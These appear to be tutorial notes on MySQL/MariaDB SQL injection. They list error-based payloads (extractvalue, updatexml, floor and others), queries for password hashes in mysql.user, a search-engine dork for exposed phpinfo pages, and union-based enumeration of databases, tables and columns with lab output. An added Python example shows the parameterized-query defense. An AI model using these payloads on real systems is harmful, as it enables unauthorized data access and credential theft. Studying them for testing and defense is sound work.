SQL Injection
Commonly used SQL functions
- MID(string, start position, end position): extracts a substring
- CHAR(ASCII code): returns the character with that ASCII code
- ASCII(character): returns the ASCII code of the character
- IF(condition, value1, value2): conditional, used for tests
- SUBSTR(string, start position, end position): extracts a substring
- LENGTH(string): returns the length of the string
- COUNT(column): returns the number of valid records in that column
- SLEEP(s): pauses for s seconds; s is numeric and can be set freely
- # /**/ --: comment markers
- CONCAT(string1, string2, ...): concatenates strings
- LOAD_FILE(filename): reads a file
- INTO OUTFILE 'filename': writes the result to a file
Ten common error-based functions
- floor()
    select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
- extractvalue()
    select * from test where id=1 and (extractvalue(1, concat(0x7e, (select user()), 0x7e)));
- updatexml()
    select * from test where id=1 and (updatexml(1, concat(0x7e, (select user()), 0x7e), 1));
- geometrycollection()
    select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));
- multipoint()
    select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));
- polygon()
    select * from test where id=1 and polygon((select * from (select * from (select user()) a) b));
- multipolygon()
    select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));
- linestring()
    select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));
- multilinestring()
    select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));
- exp()
    select * from test where id=1 and exp(~(select * from (select user()) a));
Commonly used MySQL functions
- Query the version
    select version();
- Query the passwords
    select password from mysql.user;
- Query all user data
    select * from mysql.user;
MySQL database configuration
- MySQL user privileges: information_schema.USER_PRIVILEGES
    select * from information_schema.USER_PRIVILEGES;
- MySQL databases and tables: information_schema.TABLES
    select * from information_schema.TABLES;
- MySQL databases and tables, including columns: information_schema.COLUMNS
    select * from information_schema.COLUMNS;
SQL injection testing
- Enter in the browser:
    inurl:/phpinfo.php
How SQL injection arises
- These attacks occur when untrusted data is sent to an interpreter as part of a command or query
- The attacker's malicious data can trick the interpreter
- into executing unintended commands or accessing data without proper authorization
SQL injection with an `or` clause
- Purpose
  - Retrieve every row of the table

```
# Normal query
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
+-------+------+---------+------+
1 row in set (0.000 sec)

# Injected query
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
| Jerry | boy  |      97 |   91 |
| Marry | girl |      95 |   94 |
| Tommy | boy  |      98 |   94 |
+-------+------+---------+------+
4 rows in set (0.001 sec)

MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  1 | 基本知识 | 第1章 什么是Javascript   | 1607050534 |
|  2 | 基本知识 | 第2章 HTML中的Javascript | 1607050590 |
|  3 | 基本知识 | 第3章 语言基础           | 1607052573 |
|  4 | 基本知识 | 第4章 变量、作用域和内存 | 1607070553 |
+----+----------+--------------------------+------------+
4 rows in set (0.001 sec)
```
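As an added example that is not part of these notes: the `grades` and `news` lookups shown above, rebuilt as application code once by string concatenation (which is how the `or 1=1` and `union select` inputs end up inside the statement) and once with bound parameters. The rows are constructed from the tables in the notes, and SQLite stands in for MariaDB.

```python
import sqlite3

# Sample rows constructed from the `grades` and `news` tables shown in the notes.
GRADES = [("Sunny", "boy", 93, 96), ("Jerry", "boy", 97, 91),
          ("Marry", "girl", 95, 94), ("Tommy", "boy", 98, 94)]
NEWS = [(1, "基本知识", "第1章 什么是Javascript", 1607050534),
        (2, "基本知识", "第2章 HTML中的Javascript", 1607050590)]


def make_db():
    """In-memory SQLite database standing in for the MariaDB `sel` schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE grades(name TEXT, sex TEXT, chinese INT, math INT)")
    conn.execute("CREATE TABLE news(id INTEGER, title TEXT, content TEXT, createtime INTEGER)")
    conn.executemany("INSERT INTO grades VALUES (?,?,?,?)", GRADES)
    conn.executemany("INSERT INTO news VALUES (?,?,?,?)", NEWS)
    return conn


def grades_vulnerable(conn, name):
    # The input is spliced into the statement text, so a quote in it closes the
    # string literal and everything after it is parsed as SQL (the `or 1=1` case).
    return conn.execute("SELECT * FROM grades WHERE name='" + name + "'").fetchall()


def news_vulnerable(conn, news_id):
    # Numeric context: no quote is needed, and an appended `union select` with the
    # right column count (four here, as the notes probe for) is accepted as-is.
    return conn.execute("SELECT * FROM news WHERE id=" + news_id).fetchall()


def grades_safe(conn, name):
    # Fixed statement text; `name` travels as a bound value and can only be compared.
    return conn.execute("SELECT * FROM grades WHERE name=?", (name,)).fetchall()


def news_safe(conn, news_id):
    # Same for the numeric case: a numeric string still matches its row, and any
    # other input is just a value that matches nothing, never extra syntax.
    return conn.execute("SELECT * FROM news WHERE id=?", (news_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(grades_vulnerable(db, "Sunny' or 1=1 --"))      # all four rows leak
    print(news_vulnerable(db, "0 union select 1,2,3,4"))  # [(1, 2, 3, 4)]
    print(grades_safe(db, "Sunny' or 1=1 --"))            # []
    print(news_safe(db, "0 union select 1,2,3,4"))        # []
```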
SQL injection with `order by`
- Purpose
  - Infer the total number of records in the table

```
MariaDB [sel]> select * from news where id=2 order by 5;
ERROR 1054 (42S22): Unknown column '5' in 'order clause'
MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  2 | 基本知识 | 第2章 HTML中的Javascript | 1607050590 |
+----+----------+--------------------------+------------+
1 row in set (0.000 sec)
```
SQL injection with `union`
- Purpose
  - Infer the number of columns in the table

```
# Normal query
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
+----+----------+------------------------+------------+
1 row in set (0.000 sec)

MariaDB [sel]> select * from news where id=1 union select 0,0,0;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
|  0 | 0        | 0                      |          0 |
+----+----------+------------------------+------------+
2 rows in set (0.006 sec)
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
```
- Purpose
  - Retrieve data from the mysql database

```
MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from mysql.user;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
|  1 | 2        | 127.0.0.1              |          4 |
|  1 | 2        | ::1                    |          4 |
|  1 | 2        | localhost              |          4 |
+----+----------+------------------------+------------+
4 rows in set (0.011 sec)
```
- Purpose
  - List every database name on the server

```
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from information_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime         |
+----+-------+---------+--------------------+
|  1 | 2     | 3       | information_schema |
|  1 | 2     | 3       | mysql              |
|  1 | 2     | 3       | performance_schema |
|  1 | 2     | 3       | phpmyadmin         |
|  1 | 2     | 3       | sel                |
|  1 | 2     | 3       | stu                |
+----+-------+---------+--------------------+
6 rows in set (0.018 sec)
```
- Purpose
  - List every table name on the server

```
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES;
```

- Purpose
  - List all table names in one database

```
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | bank       |
|  1 | 2     | 3       | best       |
|  1 | 2     | 3       | bestmath   |
|  1 | 2     | 3       | grades     |
|  1 | 2     | 3       | news       |
|  1 | 2     | 3       | resume     |
|  1 | 2     | 3       | stu1       |
|  1 | 2     | 3       | stu2       |
+----+-------+---------+------------+
8 rows in set (0.012 sec)
```
- Purpose
  - List all column names of one table

```
MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from information_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | id         |
|  1 | 2     | 3       | title      |
|  1 | 2     | 3       | content    |
|  1 | 2     | 3       | createtime |
+----+-------+---------+------------+
4 rows in set (0.016 sec)
```

- Purpose
  - Read the contents of a column

```
MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识 | 第1章 什么是Javascript | 1607050534 |
|  1 | 2        | 3                      | 基本知识   |
+----+----------+------------------------+------------+
2 rows in set (0.011 sec)
```